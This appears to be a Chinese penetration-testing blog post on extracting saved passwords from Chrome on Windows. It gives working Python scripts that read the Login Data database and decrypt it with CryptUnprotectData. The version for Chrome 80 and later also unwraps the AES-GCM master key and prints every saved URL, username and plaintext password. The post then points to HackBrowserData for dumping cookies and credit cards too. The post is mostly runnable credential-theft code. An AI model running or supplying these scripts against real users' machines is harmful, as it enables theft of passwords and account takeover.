Contents

抓取浏览器密码

Chrome浏览器导出

Chrome浏览器保存密码的方式

用户可以在chrome中保存密码,当需要输入对应网站的账号密码时可以自动填充。

chrome保存的密码可以在自定义及控制选项中的设置中找到:

https://s1.ax1x.com/2022/08/07/vKmaUx.png

Chrome中保存的密码先被二次加密,然后被保存在SQLite数据库文件中,位置如下:

%LocalAppData%\Google\Chrome\User Data\Default\Login Data

实际测试

使用工具读取数据库文件,测试工具:SQLiteStudio

SQLiteStudio开源,特点是支持查看十六进制数据(SQLiteSpy不支持查看十六机制数据)

利用python导出chrome密码

用python实现读取SQLite数据库文件:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
from os import getenv
import sqlite3
import binascii

conn = sqlite3.connect(getenv("APPDATA") + "\\..\\Local\\Google\\Chrome\\User Data\\Default\\Login Data")
cursor = conn.cursor()
cursor.execute('select action_url, username_value, password_value from logins')

for result in cursor.fetchall():
    print(binascii.b2a_hex(result[2]))
    

输出二次加密的用户密码

https://s1.ax1x.com/2022/08/07/vKm0PK.png

找到chromium开源代码中对用户密码二次加密的方法:Windows APICryptProtectData()实现

参考加密代码:

1
https://github.com/scheib/chromium/blob/eb7e2441dd8878f733e43799ea77c2bab66816d3/chrome/browser/password_manager/password_store_win_unittest.cc#L107

关于CryptProtectData()函数的文档:

1
https://msdn.microsoft.com/en-us/library/windows/desktop/aa380261(v=vs.85).aspx

根据文档可知:

  1. 对应解密函数为CryptUnprotectData;
  2. 只有与加密数据的用户具有相同登录凭据的用户才能解密数据;

所以只有在当前用户的凭据下才能解密数据,而且对于不同版本的Chrome有不同的解密方法

Chrome Version < 80

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
from os import getenv
import sqlite3
import win32crypt
import binascii
conn = sqlite3.connect(getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data")
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
    password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
    print password

Chrome Version > 80

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
import os
import json
import base64
import sqlite3
import win32crypt
from Cryptodome.Cipher import AES
import shutil


def get_master_key():
    with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State', "r", encoding="utf-8") as f:
        local_state = f.read()
        local_state = json.loads(local_state)

    master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    master_key = master_key[5:]
    master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1]
    return master_key


def decrypt_payload(cipher, payload):
    return cipher.decrypt(payload)


def generate_cipher(aes_key, iv):
    return AES.new(aes_key, AES.MODE_GCM, iv)


def decrypt_password(buff, master_key):
    try:
        iv = buff[3:15]
        payload = buff[15:]
        cipher = generate_cipher(master_key, iv)
        decrypt_pass = decrypt_payload(cipher, payload)
        decrypt_pass = decrypt_pass[:-16].decode()
        return decrypt_pass
    except Exception as e:
        return "Chrome < 80"

os.environ["PYTHONIOENCODING"] = 'utf-8'
master_key = get_master_key()
login_db = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\default\Login Data'
shutil.copy2(login_db, "Loginvault.db")
conn = sqlite3.connect("Loginvault.db")
cursor = conn.cursor()

try:
    cursor.execute("select action_url, username_value, password_value from logins")
    for r in cursor.fetchall():
        url = r[0]
        username = r[1]
        encrypt_password = r[2]
        decrypt_password = decrypt_password(encrypt_password, master_key)
        if len(username) > 0:
            print("URL: " + url + "\nUser Name: " + username + "\nPassword: " + decrypt_password + "\n" + "*" * 50 + "\n")

except Exception as e:
    pass

cursor.close()
conn.close()
try:
    os.remove("Loginvault.db")
except Exception as e:
    pass

注:

如果Chrome正在运行,无法查询数据库Login Data,会显示sqlite3.OperationalError: database is locked

HackBrowserData导出

1
2
HackBrowserData是一个浏览器数据(密码|历史记录|Cookie|书签|信用卡|下载记录|localStorage|浏览器插件)的导出工具,支持全平台主流浏览器。
-- Github

可以双击直接运行HackBrowserData,会直接自动导出所有相关信息;也可以使用命令行调用相应命令。

  • 双击运行

https://s1.ax1x.com/2022/08/08/vQpbaF.png

results目录里面就存放所有已经被导出的信息

  • 命令行运行

https://s1.ax1x.com/2022/08/08/vQ9gL6.png

参考链接

  1. https://github.com/moonD4rk/HackBrowserData/blob/master/README_ZH.md
  2. https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E5%AF%BC%E5%87%BAChrome%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81
  3. https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E7%A6%BB%E7%BA%BF%E5%AF%BC%E5%87%BAChrome%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81